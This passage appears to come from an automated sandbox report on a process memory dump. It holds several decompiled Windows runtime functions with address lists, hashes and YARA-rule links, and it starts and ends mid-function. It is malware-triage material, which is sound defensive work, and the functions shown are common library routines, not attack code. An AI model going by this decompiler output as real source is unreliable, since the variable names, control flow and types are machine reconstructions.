						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5437b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L05364620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0537E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                      0x0537e730
                                      0x0537e736
                                      0x0537e738
                                      0x0537e73d
                                      0x0537e73e
                                      0x0537e740
                                      0x0537e749
                                      0x0537e765
                                      0x0537e76a
                                      0x0537e76b
                                      0x0537e76c
                                      0x0537e76d
                                      0x0537e76e
                                      0x0537e76f
                                      0x0537e775
                                      0x0537e777
                                      0x0537e77e
                                      0x053bb675
                                      0x0537e784
                                      0x0537e784
                                      0x0537e789
                                      0x0537e7a8
                                      0x0537e7ac
                                      0x0537e807
                                      0x0537e7ae
                                      0x0537e7ae
                                      0x0537e7b1
                                      0x0537e7b4
                                      0x0537e7b9
                                      0x0537e7c0
                                      0x0537e7c4
                                      0x0537e7ca
                                      0x0537e7cc
                                      0x00000000
                                      0x0537e7d3
                                      0x0537e7d6
                                      0x00000000
                                      0x00000000
                                      0x0537e7ff
                                      0x0537e802
                                      0x00000000
                                      0x00000000
                                      0x0537e7f9
                                      0x0537e7fc
                                      0x00000000
                                      0x00000000
                                      0x0537e7f3
                                      0x0537e7f6
                                      0x00000000
                                      0x00000000
                                      0x0537e7ed
                                      0x0537e7f0
                                      0x00000000
                                      0x00000000
                                      0x0537e7e7
                                      0x0537e7ea
                                      0x00000000
                                      0x00000000
                                      0x053bb685
                                      0x053bb688
                                      0x00000000
                                      0x00000000
                                      0x053bb682
                                      0x00000000
                                      0x00000000
                                      0x0537e7cc
                                      0x0537e7d9
                                      0x0537e7dc
                                      0x0537e7de
                                      0x0537e7de
                                      0x0537e7ac
                                      0x0537e7e4
                                      0x0537e74b
                                      0x0537e751
                                      0x0537e759
                                      0x0537e761
                                      0x0537e761

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9673171c802392df680123fbad59612db9561cd5167a44f0b0c28f6c3c335ab0
                                      • Instruction ID: 5b1fc40b769b67b732621231b5b328a5f602954ca6b588208995c8f28f31fa9d
                                      • Opcode Fuzzy Hash: 9673171c802392df680123fbad59612db9561cd5167a44f0b0c28f6c3c335ab0
                                      • Instruction Fuzzy Hash: 5B31B175A14249EFD714CF68C845F9ABBE8FB09314F14829AF904CB741D675ED80CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537BC2C, Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E0537BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5436100; // 0x42
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E05362280(0xd, 0x1a50f1a0);
				_t41 =  *0x54360f8; // 0x0
				if(_t41 != 0) {
					 *0x54360f8 =  *_t41;
					 *0x54360fc =  *0x54360fc + 0xffff;
				}
				E0535FFB0(_t41, 0x800, 0x1a50f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x54360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L05364620(0x5436100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5436100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                      0x0537bc36
                                      0x0537bc42
                                      0x0537bc45
                                      0x0537bc4a
                                      0x0537bd35
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0537bc50
                                      0x0537bc50
                                      0x0537bc58
                                      0x0537bc5a
                                      0x0537bc60
                                      0x00000000
                                      0x00000000
                                      0x053ba4f2
                                      0x053ba4f6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053ba4fc
                                      0x0537bc79
                                      0x0537bc7e
                                      0x0537bc86
                                      0x0537bd16
                                      0x0537bd20
                                      0x0537bd20
                                      0x0537bc8d
                                      0x0537bc94
                                      0x0537bcbd
                                      0x0537bcca
                                      0x0537bccb
                                      0x0537bccc
                                      0x0537bccd
                                      0x0537bcce
                                      0x0537bcd4
                                      0x0537bcea
                                      0x0537bcee
                                      0x0537bcf2
                                      0x0537bd00
                                      0x0537bd04
                                      0x00000000
                                      0x0537bc96
                                      0x0537bcab
                                      0x0537bcaf
                                      0x0537bd2c
                                      0x0537bd2c
                                      0x0537bd09
                                      0x00000000
                                      0x0537bd09
                                      0x0537bcb1
                                      0x0537bcb5
                                      0x0537bcbb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0537bcbb

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c90ce70095ef9e0decdcfaba697fcba468a9d37ae95cba3011d35ba362d750a
                                      • Instruction ID: ef8ee4805f3f81eda98457142582b221b0a7a546978054fbbc978387b1e43596
                                      • Opcode Fuzzy Hash: 3c90ce70095ef9e0decdcfaba697fcba468a9d37ae95cba3011d35ba362d750a
                                      • Instruction Fuzzy Hash: 2031D136A1461AABCB21DF58D4D17E6B7B9FB18310F068079ED45DB201FB78DA058B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05371DB5, Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E05371DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0536F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L05364620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0536F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                      0x05371dc2
                                      0x05371dc5
                                      0x05371dc7
                                      0x05371dcc
                                      0x05371dce
                                      0x05371dd6
                                      0x05371ddf
                                      0x05371de0
                                      0x05371de1
                                      0x05371de5
                                      0x05371de8
                                      0x05371def
                                      0x05371df0
                                      0x05371df6
                                      0x05371df7
                                      0x05371dfe
                                      0x05371e1a
                                      0x00000000
                                      0x00000000
                                      0x05371e0b
                                      0x05371e12
                                      0x05371e12
                                      0x05371e00
                                      0x05371e00
                                      0x05371e05
                                      0x05371e1e
                                      0x05371e23
                                      0x053b570f
                                      0x053b5713
                                      0x00000000
                                      0x00000000
                                      0x053b5719
                                      0x053b5719
                                      0x05371e2c
                                      0x05371e2d
                                      0x05371e2e
                                      0x05371e2f
                                      0x05371e31
                                      0x05371e32
                                      0x05371e35
                                      0x05371e3d
                                      0x053b5723
                                      0x053b573d
                                      0x053b573d
                                      0x00000000
                                      0x053b5723
                                      0x05371e49
                                      0x05371e4e
                                      0x05371e4e
                                      0x05371e09
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction ID: 327819dcabd2da06f842e1211dc9360bf7f95370bbcdf42e1c5784171a9c62e9
                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction Fuzzy Hash: BE218E72A0021DEFD721DF99CC84EABBBBDFF85640F214059E905D7A10D678AE11CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05349100, Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E05349100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x541f6e8);
				E0539D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E054188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0539D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x54386c0; // 0x35907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x54386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E05362280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E054188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0538AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x543b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x54384c0;
										if(_t69 >=  *0x54384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05419063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0534922A(_t82);
							_t53 = E05367D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05418B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x54386c0; // 0x35907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x54386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x54386bc;
										_t72 = 0x54386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E05349240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x54386c4;
									_t72 = 0x54386c0;
									L18:
									E05379B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                      0x05349100
                                      0x05349100
                                      0x05349100
                                      0x05349100
                                      0x05349102
                                      0x05349107
                                      0x0534910c
                                      0x05349110
                                      0x05349115
                                      0x05349136
                                      0x05349143
                                      0x053a37e4
                                      0x053a37e4
                                      0x05349149
                                      0x0534914e
                                      0x0534914e
                                      0x05349117
                                      0x0534911d
                                      0x00000000
                                      0x00000000
                                      0x0534911f
                                      0x05349125
                                      0x00000000
                                      0x05349151
                                      0x05349158
                                      0x0534915d
                                      0x05349161
                                      0x05349168
                                      0x053a3715
                                      0x00000000
                                      0x0534916e
                                      0x0534916e
                                      0x05349175
                                      0x05349177
                                      0x0534917e
                                      0x0534917f
                                      0x05349182
                                      0x05349182
                                      0x05349187
                                      0x05349187
                                      0x0534918a
                                      0x0534918d
                                      0x0534918f
                                      0x05349192
                                      0x05349195
                                      0x05349198
                                      0x05349198
                                      0x05349198
                                      0x0534919a
                                      0x00000000
                                      0x00000000
                                      0x053a371f
                                      0x053a3721
                                      0x053a3727
                                      0x053a372f
                                      0x053a3733
                                      0x053a3735
                                      0x053a3738
                                      0x053a373b
                                      0x053a373d
                                      0x053a3740
                                      0x00000000
                                      0x00000000
                                      0x053a3746
                                      0x053a3749
                                      0x00000000
                                      0x00000000
                                      0x053a374f
                                      0x053a3751
                                      0x00000000
                                      0x00000000
                                      0x053a3757
                                      0x053a3759
                                      0x053a375c
                                      0x053a375c
                                      0x053a375e
                                      0x053a375e
                                      0x053a3761
                                      0x053a3764
                                      0x00000000
                                      0x00000000
                                      0x053a3766
                                      0x053a3768
                                      0x053a37a3
                                      0x053a37a3
                                      0x053a37a5
                                      0x053a37a7
                                      0x053a37ad
                                      0x053a37b0
                                      0x053a37b2
                                      0x053a37bc
                                      0x053a37c2
                                      0x053a37c2
                                      0x053a37b2
                                      0x05349187
                                      0x05349187
                                      0x0534918a
                                      0x0534918d
                                      0x0534918f
                                      0x05349192
                                      0x05349195
                                      0x00000000
                                      0x05349195
                                      0x00000000
                                      0x05349187
                                      0x053a376a
                                      0x053a376a
                                      0x053a376c
                                      0x053a376c
                                      0x053a376f
                                      0x053a3775
                                      0x00000000
                                      0x00000000
                                      0x053a3777
                                      0x053a3779
                                      0x00000000
                                      0x00000000
                                      0x053a3782
                                      0x053a3787
                                      0x053a3789
                                      0x053a3790
                                      0x053a3790
                                      0x053a378b
                                      0x053a378b
                                      0x053a378b
                                      0x053a3792
                                      0x053a3795
                                      0x053a3795
                                      0x053a3798
                                      0x053a3798
                                      0x053a379b
                                      0x053a379b
                                      0x053491a3
                                      0x053491a9
                                      0x053491b0
                                      0x053491b4
                                      0x053491b4
                                      0x053491bb
                                      0x053491c0
                                      0x053491c5
                                      0x053491c7
                                      0x053a37da
                                      0x053491cd
                                      0x053491cd
                                      0x053491cd
                                      0x053491d2
                                      0x053491d5
                                      0x05349239
                                      0x05349239
                                      0x053491d7
                                      0x053491db
                                      0x053491e1
                                      0x053491e7
                                      0x053491fd
                                      0x05349203
                                      0x0534921e
                                      0x05349223
                                      0x00000000
                                      0x05349223
                                      0x05349205
                                      0x05349208
                                      0x0534920c
                                      0x05349214
                                      0x05349214
                                      0x053491e9
                                      0x053491e9
                                      0x053491ee
                                      0x053491f3
                                      0x053491f3
                                      0x053491f3
                                      0x053491e7
                                      0x00000000
                                      0x053491db
                                      0x05349187
                                      0x05349168

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9fa584687fd9bcd8d2fc81e178232c6c1aaea865d3d5075c1332c0fa1c081f2
                                      • Instruction ID: 61be76c1c59198b2cb574f567b0f2211111bdbec739b396ccf82841f9cf4af80
                                      • Opcode Fuzzy Hash: b9fa584687fd9bcd8d2fc81e178232c6c1aaea865d3d5075c1332c0fa1c081f2
                                      • Instruction Fuzzy Hash: 9731E276A05244DFDB26DF68C088BEEBBF2BB88354F18815AD40567251C7B5B980CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05360050, Relevance: .1, Instructions: 81COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E05360050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x543d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E05379ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0538B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05418A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E05379702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x543b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                      0x05360055
                                      0x0536005d
                                      0x05360062
                                      0x0536006c
                                      0x0536006f
                                      0x05360074
                                      0x0536007a
                                      0x0536007a
                                      0x05360080
                                      0x05360080
                                      0x05360087
                                      0x0536008d
                                      0x0536008f
                                      0x05360093
                                      0x05360095
                                      0x0536009b
                                      0x053600f8
                                      0x053600fb
                                      0x053600fc
                                      0x053600ff
                                      0x05360108
                                      0x05360108
                                      0x053600a2
                                      0x053600a6
                                      0x053600b3
                                      0x053600bc
                                      0x053600c5
                                      0x053600ca
                                      0x053ac01e
                                      0x00000000
                                      0x00000000
                                      0x053ac02d
                                      0x053600d5
                                      0x053600d9
                                      0x053ac03d
                                      0x053ac046
                                      0x053ac046
                                      0x053600df
                                      0x053600e2
                                      0x053600ea
                                      0x053600ef
                                      0x053600f2
                                      0x053600f6
                                      0x05360111
                                      0x05360117
                                      0x05360117
                                      0x00000000
                                      0x053600f6
                                      0x053600d0
                                      0x053600d0
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0012913d5f6ef97bcc2dcf9a52b8e01db6110ac67bc45a05de801564e007d818
                                      • Instruction ID: 7db313323f4479157b1b442a5ab55bc0850b8bf5b4b069ca05b006a1a6dac772
                                      • Opcode Fuzzy Hash: 0012913d5f6ef97bcc2dcf9a52b8e01db6110ac67bc45a05de801564e007d818
                                      • Instruction Fuzzy Hash: 7B319131601B04CFD725CF28C849BA6B7E6FF88714F14856DE49687B90EB75AC01CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C6C0A, Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E053C6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E05367D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5437b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L05364620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0538F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E05367D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05389AE0();
						_t23 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                      0x053c6c0a
                                      0x053c6c0f
                                      0x053c6c10
                                      0x053c6c13
                                      0x053c6c15
                                      0x053c6c19
                                      0x053c6c1c
                                      0x053c6c21
                                      0x053c6c28
                                      0x053c6c3a
                                      0x053c6c2a
                                      0x053c6c33
                                      0x053c6c33
                                      0x053c6c3f
                                      0x053c6c48
                                      0x053c6c4d
                                      0x053c6c60
                                      0x053c6c65
                                      0x053c6c69
                                      0x053c6c73
                                      0x053c6c79
                                      0x053c6c7f
                                      0x053c6c86
                                      0x053c6c90
                                      0x053c6c94
                                      0x053c6ca6
                                      0x053c6cb2
                                      0x053c6cbd
                                      0x053c6cbd
                                      0x053c6cc3
                                      0x053c6cc7
                                      0x053c6ccb
                                      0x053c6cd0
                                      0x053c6cd1
                                      0x053c6ce2
                                      0x053c6ce2
                                      0x053c6c69
                                      0x053c6ced

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87eb6856354c855d95b4996c710ad4c4bb74e86fd9bbfa10585c06e9914e420f
                                      • Instruction ID: 7139e7dfe99237c1514d50eef02593cfe7c181e36320ba1b801d704cd5622d7f
                                      • Opcode Fuzzy Hash: 87eb6856354c855d95b4996c710ad4c4bb74e86fd9bbfa10585c06e9914e420f
                                      • Instruction Fuzzy Hash: 26218BB1A00644AFD715DB68D884F6AB7B8FF48744F1480A9F905D7B91D638ED10CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053890AF, Relevance: .1, Instructions: 76COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E053890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
